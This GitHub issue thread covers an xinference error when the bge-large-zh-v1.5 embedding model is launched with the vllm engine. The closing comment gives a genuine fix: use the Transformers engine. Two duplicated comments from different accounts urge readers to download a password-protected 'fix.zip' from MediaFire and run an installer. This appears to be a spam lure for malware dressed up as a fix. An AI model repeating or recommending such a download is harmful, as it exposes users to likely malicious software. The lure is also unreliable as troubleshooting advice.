### ISSUE TITLE
xinference launch bge-large-zh-v1.5模型后，调用报错

### ISSUE THREAD

**Issue by chk4991** [xorbitsai/inference#2159]
### System Info / 系統信息

安装了vllm和pytorch、transformers

### Running Xinference with Docker? / 是否使用 Docker 运行 Xinfernece？

- [ ] docker / docker
- [ ] pip install / 通过 pip install 安装
- [ ] installation from source / 从源码安装

### Version info / 版本信息

xinference 0.14.3

### The command used to start Xinference / 用以启动 xinference 的命令

启动xinference服务
HF_ENDPOINT=https://hf-mirror.com xinference-local --host 0.0.0.0 --port 8001
启动embedding模型服务
xinference launch --model-name bge-large-zh-v1.5 --model-type embedding -e http://127.0.0.1:8001 -en vllm -f pytorch

### Reproduction / 复现过程

2024-08-26 08:07:14,174 xinference.api.restful_api 85235 ERROR    [address=0.0.0.0:34731, pid=85724] Expected q_dtype == at::kHalf || q_dtype == at::kBFloat16 to be true, but got false.  (Could this error message be improved?  If so, please report an enhancement request to PyTorch.)

### Expected behavior / 期待表现

希望调用embedding成功

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Valdanitooooo** [comment]
按文档 https://inference.readthedocs.io/zh-cn/latest/models/builtin/embedding/bge-large-zh-v1.5.html# 
> -en vllm
这里去掉就行了
emb 默认的应该用 -en Transformers -f pytorch
